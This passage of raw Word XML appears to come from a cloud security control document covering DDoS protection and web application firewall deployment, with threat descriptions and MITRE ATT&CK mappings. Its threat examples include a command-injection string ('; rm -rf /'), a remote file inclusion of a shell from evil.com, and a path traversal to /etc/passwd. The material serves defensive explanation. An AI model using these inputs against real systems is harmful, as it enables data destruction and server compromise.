          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Limited Layer 7 attacks, such as HTTP GET/POST floods, target application resources (e.g., CPU, memory, or database connections) to overwhelm web servers or APIs. These attacks aim to exhaust compute resources, causing latency spikes or outages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4AA793" w14:textId="176A7B0E" w:rsidR="003E39F5" w:rsidRDefault="003E39F5" w:rsidP="00044A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E39F5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Amplification attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D65D9CD" w14:textId="329743E9" w:rsidR="00044A70" w:rsidRDefault="00044A70" w:rsidP="00044A70">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00044A70">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers exploit misconfigured servers (e.g., DNS, NTP, or Plex Media servers on UDP 32414) to amplify traffic, sending small queries that generate large responses directed at the target, overwhelming network capacity. Examples include DNS amplification or SSDP reflection attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C0DBC9" w14:textId="71DD137E" w:rsidR="003C3B8B" w:rsidRDefault="003C3B8B" w:rsidP="003C3B8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C3B8B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB3398" w14:textId="2254EC45" w:rsidR="00D76C03" w:rsidRDefault="00D76C03" w:rsidP="00B667B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D76C03">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368D93A5" w14:textId="110DE664" w:rsidR="00B667B2" w:rsidRPr="003C3B8B" w:rsidRDefault="00B667B2" w:rsidP="00B667B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B667B2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1FC7ED" w14:textId="4D9A95EF" w:rsidR="003E39F5" w:rsidRDefault="00B667B2" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B667B2">
        <w:t>NS-5.1: Implement DDOS protection in the appropriate network tier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C722AA" w14:textId="4A9AF03A" w:rsidR="008D6543" w:rsidRDefault="008D6543" w:rsidP="008D6543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy DDoS protection at both network and application layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5C04B" w14:textId="712AFC55" w:rsidR="008D6543" w:rsidRDefault="008D6543" w:rsidP="008D6543">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D6543">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy network layer DDoS protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1D9E3" w14:textId="7673E4F6" w:rsidR="005552D0" w:rsidRDefault="005552D0" w:rsidP="005552D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005552D0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Choose between DDoS Network Protection for workload deployments requiring comprehensive VNet coverage and rapid response support for attack investigation and post-attack analysis, or DDoS IP Protection for cost-effective protection of a limited number of IPs without rapid response support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58734864" w14:textId="7BEB5F60" w:rsidR="00C52DAF" w:rsidRDefault="00C52DAF" w:rsidP="00337E8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C52DAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Deploy </w:t>
      </w:r>
      <w:r w:rsidR="00337E8E" w:rsidRPr="00C52DAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>application</w:t>
      </w:r>
      <w:r w:rsidRPr="00C52DAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00337E8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">layer </w:t>
      </w:r>
      <w:r w:rsidRPr="00C52DAF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DDoS protection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2795E" w14:textId="762768F3" w:rsidR="00337E8E" w:rsidRDefault="00337E8E" w:rsidP="00337E8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00337E8E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable DDoS protection on Azure Web Application Firewall (WAF), Application Gateway, or Azure Front Door to defend against application layer (Layer 7) attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45793696" w14:textId="13EC9D1B" w:rsidR="00CC5CE8" w:rsidRDefault="00CC5CE8" w:rsidP="00B0403B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC5CE8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure monitoring and alerts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BD8D0" w14:textId="0C670D82" w:rsidR="00B0403B" w:rsidRDefault="00B0403B" w:rsidP="00B0403B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B0403B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure alerts and monitor metrics and logs from the DDoS protection service and your applications to ensure protection effectiveness, application resilience, and desired performance during and after attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332C1B8A" w14:textId="77777777" w:rsidR="0079318A" w:rsidRDefault="0079318A" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16BEB4A5" w14:textId="77777777" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="790141D9" w14:textId="77777777" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BCFB3B0" w14:textId="77777777" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400C744B" w14:textId="77777777" w:rsidR="001072B1" w:rsidRDefault="001072B1" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D052D7" w14:textId="77777777" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="0079318A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="130E6752" w14:textId="4864E094" w:rsidR="00AA61B0" w:rsidRPr="001072B1" w:rsidRDefault="0079318A" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc236841625"/>
      <w:r w:rsidRPr="001072B1">
        <w:t>NS-6: Deploy web application firewall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="404E6ED3" w14:textId="2FE7F8AD" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="009356A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009356A3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A0EED7" w14:textId="35D957A1" w:rsidR="009356A3" w:rsidRDefault="009356A3" w:rsidP="00A631CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009356A3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy a web application firewall (WAF) and configure rules to safeguard web applications and APIs from application-specific attacks by inspecting, detecting, and filtering malicious HTTP/HTTPS traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CDAE8F" w14:textId="5F682D96" w:rsidR="00A631CF" w:rsidRDefault="0026348A" w:rsidP="00A631CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="007371B0" w:rsidRPr="0026348A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33A7FF" w14:textId="731D80FB" w:rsidR="007371B0" w:rsidRDefault="007371B0" w:rsidP="00860062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007371B0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Injection attacks (e.g., SQL injection, command injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3386D2" w14:textId="396968D3" w:rsidR="00860062" w:rsidRDefault="00860062" w:rsidP="00860062">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860062">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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 ; rm -rf / via a form field).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2AFD90" w14:textId="3D6080E0" w:rsidR="00860062" w:rsidRDefault="00860062" w:rsidP="00B71BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00860062">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP protocol violations and malformed requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61750D5E" w14:textId="3A212A52" w:rsidR="00B71BF0" w:rsidRDefault="00B71BF0" w:rsidP="00B71BF0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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1B696D44" w:rsidR="00B71BF0" w:rsidRDefault="00B71BF0" w:rsidP="001B0CF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B71BF0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bot-driven attacks (e.g., credential stuffing, scraping)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3F1B8D" w14:textId="3C835EB4" w:rsidR="001B0CF7" w:rsidRDefault="001B0CF7" w:rsidP="001B0CF7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B0CF7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>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0EDBF4A5" w:rsidR="00FF74A6" w:rsidRDefault="00FF74A6" w:rsidP="00FF74A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF74A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Application-specific exploits (e.g., remote file Inclusion, local file inclusion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23465EAE" w14:textId="7A8129E7" w:rsidR="00FF74A6" w:rsidRDefault="00FF74A6" w:rsidP="00FF74A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF74A6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Attackers exploit vulnerabilities to include malicious files (e.g., include 'http://evil.com/shell.php') or access local server files (e.g., ../../etc/passwd) via manipulated URL parameters or form inputs, enabling code execution or data exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5938F31F" w14:textId="768DDF8D" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00193936">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02D4D3" w14:textId="1E103A70" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00132074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31676B6E" w14:textId="762FA26B" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00132074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Execution (TA0002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14296D4F" w14:textId="7EF184EA" w:rsidR="00193936" w:rsidRDefault="00193936" w:rsidP="00132074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00193936">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
